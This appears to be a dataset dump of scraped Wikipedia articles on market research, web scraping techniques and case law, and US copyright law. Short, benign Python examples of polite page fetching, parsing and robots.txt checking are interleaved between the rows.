386 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Market_research | Market research is an organized effort to gather information about target markets and customers.It involves understanding who they are and what they need. 1 It is an important component of business strategy 2 and a major factor in maintaining competitiveness. Market research helps to identify and analyze the needs of the market, the market size and the competition. Its techniques encompass both qualitative techniques such as focus groups, in-depth interviews, and ethnography, as well as quantitative techniques such as customer surveys, and analysis of secondary data. It includes social and opinion research, and is the systematic gathering and interpretation of information about individuals or organizations using statistical and analytical methods and techniques of the applied social sciences to gain insight or support decision making. 3 Market research, marketing research, and marketing are a sequence of business activities; 4 5 sometimes these are handled informally. 6 The field of marketing research is much older than that of market research. 7 Although both involve consumers, Marketing research is concerned specifically about marketing processes, such as advertising effectiveness and salesforce effectiveness, while market research is concerned specifically with markets and distribution. 8 Two explanations given for confusing Market research with Marketing research are the similarity of the terms and also that Market Research is a subset of Marketing Research. 9 10 11 Further confusion exists because of major companies with expertise and practices in both areas. 12 Although market research started to be conceptualized and put into formal practice during the 1930s as an offshoot of the advertising boom of the Golden Age of radio in the United States, this was based on 1920s work by Daniel Starch. Starch "developed a theory that advertising had to be seen, read, believed, remembered, and most importantly, acted upon, in order to be considered effective. 13 Advertisers realized the significance of demographics by the patterns in which they sponsored different radio programs. citation needed The Gallup Organization helped invent the public opinion poll; today, "Market research is a way of paying for it. 14 Market research is a way of getting an overview of consumers' wants, needs and beliefs. It can also involve discovering how they act. The research can be used to determine how a product could be marketed. Peter Drucker believed 15 market research to be the quintessence of marketing. Market research is a way that producers and the marketplace study the consumer and gather information about the consumers' needs. There are two major types of market research: primary research, which is sub-divided into quantitative and qualitative research, and secondary research. Factors that can be investigated through market research include: Another factor that can be measured is marketing effectiveness. This includes: "Rigorous sampling methodologies combined with high-quality data collection" is what the magazine Advertising Age considers the backbone of market research. 18 Data collection can be done by observing customer behavior through in-situ studies or by processing e.g. log files, by interviewing customers, potential customers, stakeholders, or a sample of the general population. 
The data can be quantitative in nature (counting sales, clicks, eye-tracking) or qualitative (surveys, questionnaires, interviews, feedback). Aggregating, visualizing, and turning data into actionable insights is one of the major challenges of market research and today, text analytics affords market researches methods to process large amounts of qualitative information and turn it into quantitative data, which is easier to visualize and use for formalized decision making. 19 Data collection can use larger audience samples than the few hundred or thousand typically used in market research. 20 Also required is the (at least passive) 21 cooperation of those being surveyed; 22 trust 23 is also helpful. 24 Translation is an essential comprehension tool for global consumers and is not a simple act of replacing words in one language with words in another. 25 Some data collection is incentivized: a simple form is when those on the road contribute to traffic reporting of which they are consumers. More complex is the relationship of consumer-to-business (C2B), which sometimes introduces reliability problems. 26 Other data collection is to know more about the market, 27 which is the purpose of market research. 28 The international growth of available research both from and via the Internet 13 has influenced a vast number of consumers and those from whom they make purchases. 29 Although emerging global markets, such as China, Indonesia and Russia are still smaller than the US in B2B e-commerce, their internet-fueled growth factor is stimulated by product-enhancing websites, graphics, and content designed to attract corporate and consumer B2C shoppers. Estimates for 2010 show between US$400 billion and $600 billion in revenue was generated by this medium. A report titled "Global B2C E-Commerce and Online Payment Market 2014" indicated a decrease in overall growth rates in North America and Western Europe, even as absolute growth numbers rose. The UK Market Research Society (MRS) listed the top social media platforms primarily used by millennials are LinkedIn, Facebook, YouTube and Instagram. Regarding details for worldwide corporate market research, "most of them are never written about because they are the consumer research done by the country's manufacturers. 30 Also less written about is tailored translation approaches based on the expertise or resources available in the local country. 25 To mitigate implicit and unconscious bias in market research design, researchers have suggested conducting bias testing via interviewer-moderated technology-aided, unmoderated methods. 31 Market research data has loss prevention aspects; that less than 60 percent of all proposed modifications and new products are deemed failures. 30 When information about the market is difficult to acquire, and the cost of "going ahead with the decision" to offer the product or service is affordable, the research cost may be more profitably used "to ensure that the new line got the advertising send-off it needed to have the best chances of succeeding. 32 As measured in revenue, US based Amazon is the worldwide E-Commerce leader. The film industry is an example where the importance of testing film content and marketing material involves: Market research is an industry that overlaps with and is often referred to as the "insights" industry. 34 However, the distinctive methods and techniques of market research not always correspond to the digital-first approach of insights vendors. 
The emergence of insights focusing on data analytics rather than fieldwork is competing with market research for managerial attention and funding. Current research with market research practitioners shows two pressing concerns for the industry: online data commoditization and the increasing distance between market researchers and top management within client organizations. Both concerns boil down to the risk they perceived of market research becoming a legacy activity of the marketing department rather than the cornerstone of business strategy. 34 Market research aims to produce so-called "actionable knowledge" that firms find useful in their operations: 35 Small organizations and non-profits can derive needed information by observing the environment of their location. Small scale surveys and focus groups are low cost ways to gather information from potential and existing customers and donors. While secondary data (statistics, demographics, etc.) is available to the public in libraries or on the internet, primary sources, done well, can be quite valuable: talking for an hour each, to twelve people, two apiece from six potential clients, can "get inside their minds.. get a feel for their needs, wants and pain. You can't get that from a questionnaire. 36 This article incorporates public domain material from websites or documents of the Small Business Administration. |
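The market research passage above notes that text analytics can turn qualitative survey feedback into quantitative data. A toy sketch of that idea, using invented responses, might look like this:

# Toy sketch: turning open-ended survey answers (qualitative data) into counts
# (quantitative data). The responses below are invented for illustration.
from collections import Counter
import re

responses = [
    "Love the product but shipping was slow",
    "Shipping was slow and support never answered",
    "Great support, fair price",
]

# Normalise and count words, dropping very short words for a quick signal
words = re.findall(r"[a-z]+", " ".join(responses).lower())
counts = Counter(w for w in words if len(w) > 3)
print(counts.most_common(5))   # e.g. [('shipping', 2), ('slow', 2), ('support', 2), ...]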
388 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_note-28 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. 
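To illustrate the point above about JSON data feeds, the sketch below reads a feed directly instead of parsing rendered HTML; the endpoint URL and field structure are hypothetical placeholders, not a real API.

# Hedged sketch of consuming a JSON data feed rather than scraping rendered HTML.
# The endpoint URL is hypothetical; substitute a real feed you are permitted to access.
import requests
import pandas as pd

url = "https://example.com/api/listings.json"   # hypothetical JSON endpoint
resp = requests.get(url, timeout=10)
resp.raise_for_status()

records = resp.json()                 # parsed Python objects, no HTML parsing needed
df = pd.json_normalize(records)       # flatten nested JSON into a tabular DataFrame
print(df.head())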
A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. 
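Both approaches mentioned above, regular-expression matching and DOM parsing with XPath, can be sketched briefly. The example assumes the lxml package is installed (it is not among the installs at the top of this notebook) and uses example.com purely as a placeholder target.

# Sketch of regex-based extraction versus DOM/XPath parsing; assumes lxml is installed.
import re
import requests
from lxml import html

resp = requests.get("https://example.com", timeout=10)

# 1) grep-style extraction: pull anything that looks like a link out of the raw HTML
links_by_regex = re.findall(r'href="(https?://[^"]+)"', resp.text)

# 2) DOM parsing: build a tree and query it with XPath instead of raw patterns
tree = html.fromstring(resp.content)
links_by_xpath = tree.xpath("//a/@href")

print(len(links_by_regex), len(links_by_xpath))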
Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. 
389 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_ref-impervawp2011_14-0 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting data from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing. Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. 
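As a minimal illustration of the fetch-then-extract cycle described above, the sketch below uses the same requests and BeautifulSoup libraries loaded earlier in this notebook; the URL and the extracted fields are placeholders, not part of the scraped source.

import requests
from bs4 import BeautifulSoup

def fetch_and_extract(url="https://example.com"):  # placeholder URL
    # Fetch: download the page, much as a browser would.
    response = requests.get(url, timeout=10)
    response.raise_for_status()
    # Extract: parse the HTML and pull out the pieces of interest.
    soup = BeautifulSoup(response.text, "html.parser")
    title = soup.title.get_text(strip=True) if soup.title else None
    links = [a.get("href") for a in soup.find_all("a", href=True)]
    return {"title": title, "links": links}

print(fetch_and_extract())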
A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a common URL scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as XPath can be used to parse the resulting DOM tree. There are several companies that have developed vertical-specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical, and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually the number of fields) and its scalability (how quickly it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformats do, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Newer approaches use advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. 
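The regular-expression approach mentioned above can be sketched in a few lines of Python; the HTML snippet and the patterns below are invented purely for illustration.

import re

# Invented sample markup; a real page would come from a fetched response.
html = """
<p>Contact sales@example.com or support@example.org for details.</p>
<p>Price: $19.99 (was $24.50)</p>
"""

emails = re.findall(r"[\w.+-]+@[\w-]+\.[\w.-]+", html)
prices = re.findall(r"\$\d+(?:\.\d{2})?", html)
print(emails)  # ['sales@example.com', 'support@example.org']
print(prices)  # ['$19.99', '$24.50']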
Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. 
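As a rough sketch of how a framework such as Scrapy (listed above) structures a scraper, the spider below assumes Scrapy is installed and uses a placeholder start URL and CSS selector.

import scrapy

class ExampleSpider(scrapy.Spider):
    name = "example"
    start_urls = ["https://example.com"]  # placeholder start page

    def parse(self, response):
        # Yield one item per matching element; the selector is a placeholder.
        for heading in response.css("h2::text").getall():
            yield {"heading": heading.strip()}

# Run from a shell with:  scrapy runspider example_spider.py -o headings.json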
However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA) and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's web-search software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo!, and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking were sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system, and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in Cvent, Inc. v. Eventbrite, Inc. in the United States District Court for the Eastern District of Virginia, the court ruled that the terms of use must be brought to the users' attention in order for a browse-wrap contract or license to be enforced. 
16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200–300 search requests to QVC's website per minute, sometimes up to 36,000 requests per minute), which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. On the plaintiff's web site during the period of this trial, the terms-of-use link was displayed among all the links of the site, at the bottom of the page, as on most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor of common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit for reconsideration in light of the 2021 Supreme Court decision in Van Buren v. United States, which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld its prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court for the Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 
26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving aside a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating terms of use that prohibit data scraping will be a violation of contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
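Two widely used counter-measures are robots.txt directives and rate limiting. From the scraper's side, a polite client can check robots.txt and throttle its own requests; the sketch below assumes placeholder URLs and paths and uses the standard-library robotparser together with requests.

import time
import requests
from urllib.parse import urljoin
from urllib.robotparser import RobotFileParser

base = "https://example.com"  # placeholder site
rp = RobotFileParser()
rp.set_url(urljoin(base, "/robots.txt"))
rp.read()

for path in ["/", "/about", "/contact"]:  # placeholder paths
    url = urljoin(base, path)
    if not rp.can_fetch("*", url):
        print("Disallowed by robots.txt, skipping:", url)
        continue
    response = requests.get(url, timeout=10)
    print(url, response.status_code)
    time.sleep(2)  # simple politeness delay between requests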
390 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/US_Copyright_law | The copyright law of the United States grants monopoly protection for "original works of authorship". 1 2 With the stated purpose to promote art and culture, copyright law assigns a set of exclusive rights to authors: to make and sell copies of their works, to create derivative works, and to perform or display their works publicly. These exclusive rights are subject to a time and generally expire 70 years after the author's death or 95 years after publication. In the United States, works published before January 1, 1929, are in the public domain. United States copyright law was last generally revised by the Copyright Act of 1976, codified in Title 17 of the United States Code. The United States Constitution explicitly grants Congress the power to create copyright law under Article 1, Section 8, Clause 8, known as the Copyright Clause. 3 Under the Copyright Clause, Congress has the power "To promote the Progress of Science and useful Arts, by securing for limited Times to Authors and Inventors the exclusive Right to their respective Writings and Discoveries. 3 The United States Copyright Office handles copyright registration, recording of copyright transfers, and other administrative aspects of copyright law. 4 United States copyright law traces its lineage back to the British Statute of Anne, which influenced the first U.S. federal copyright law, the Copyright Act of 1790. The length of copyright established by the Founding Fathers was 14 years, plus the ability to renew it one time, for 14 more. 40 years later, the initial term was changed to 28 years. It was not until a full 180 years after its establishment that it was significantly extended beyond that, through the Copyright Act of 1976 to "Either 75 years or the life of the author plus 50 years" and the Sonny Bono Copyright Term Extension Act of 1998 (also called the "Mickey Mouse Protection Act", because it prevented the copyright from expiring on the first commercial success of the Disney cartoon character Mickey Mouse), which increased it even more, to 95 years after publication (120 years after creation for unpublished works), or the life of the author plus 70 years, whichever ends earlier. The Congress shall have Power ... to promote the Progress of Science and useful Arts, by securing for limited Times to Authors and Inventors the exclusive Right to their respective Writings and Discoveries. The goal of copyright law, as set forth in the Copyright Clause of the US Constitution, is "to promote the Progress of Science and useful Arts, by securing for limited Times to Authors and Inventors the exclusive Right to their respective Writings and Discoveries. 3 This includes incentivizing the creation of art, literature, architecture, music, and other works of authorship. As with many legal doctrines, the effectiveness of copyright law in achieving its stated purpose is a matter of debate. 5 The United States copyright law protects "original works of authorship" fixed in a tangible medium, 1 including literary, dramatic, musical, artistic, and other intellectual works. This protection is available to both published and unpublished works. Copyright law includes the following types of works: Copyright law protects the "expression" of an idea, but copyright does not protect the "idea" itself. This distinction is called the idea expression dichotomy. 7 The distinction between "idea" and "expression" is fundamental to copyright law. 
From the Copyright Act of 1976 (17 U.S.C. 102): In no case does copyright protection for an original work of authorship extend to any idea, procedure, process, system, method of operation, concept, principle, or discovery, regardless of the form in which it is described, explained, illustrated, or embodied in such work. For example, a paper describing a political theory is copyrightable. The paper is the expression of the author's ideas about the political theory. The theory itself is just an idea, and is not copyrightable. Another author is free to describe the same theory in their own words without infringing on the original author's copyright. 8 Although fundamental, the idea expression dichotomy is often difficult to put into practice. Reasonable people can disagree about where the unprotectable "idea" ends and the protectable "expression" begins. As Judge Learned Hand put it, "Obviously, no principle can be stated as to when an imitator has gone beyond copying the 'idea, and has borrowed its 'expression. Decisions must therefore inevitably be ad hoc. 9 Mere facts are not copyrightable. However, compilations of facts are treated differently, and may be copyrightable material. The Copyright Act, 103, allows copyright protection for "compilations", as long as there is some "creative" or "original" act involved in developing the compilation, such as in the selection (deciding which facts to include or exclude) and arrangement (how facts are displayed and in what order). Copyright protection in compilations is limited to the selection and arrangement of facts, not to the facts themselves. The Supreme Court decision in Feist Publications, Inc., v. Rural Telephone Service Co. clarified the requirements for copyright in compilations. The Feist case denied copyright protection to a "white pages" phone book (a compilation of telephone numbers, listed alphabetically). In making this ruling, the Supreme Court rejected the "sweat of the brow" doctrine. That is, copyright protection requires creativity, and no amount of hard work ("sweat of the brow") can transform a non-creative list (like an alphabetical listing of phone numbers) into copyrightable subject matter. A mechanical, non-selective collection of facts (e.g., alphabetized phone numbers) cannot be protected by copyright. 10 Copyright protects artistic expression. Copyright does not protect useful articles, or objects with some useful functionality. The Copyright Act states: A "useful article" is an article having an intrinsic 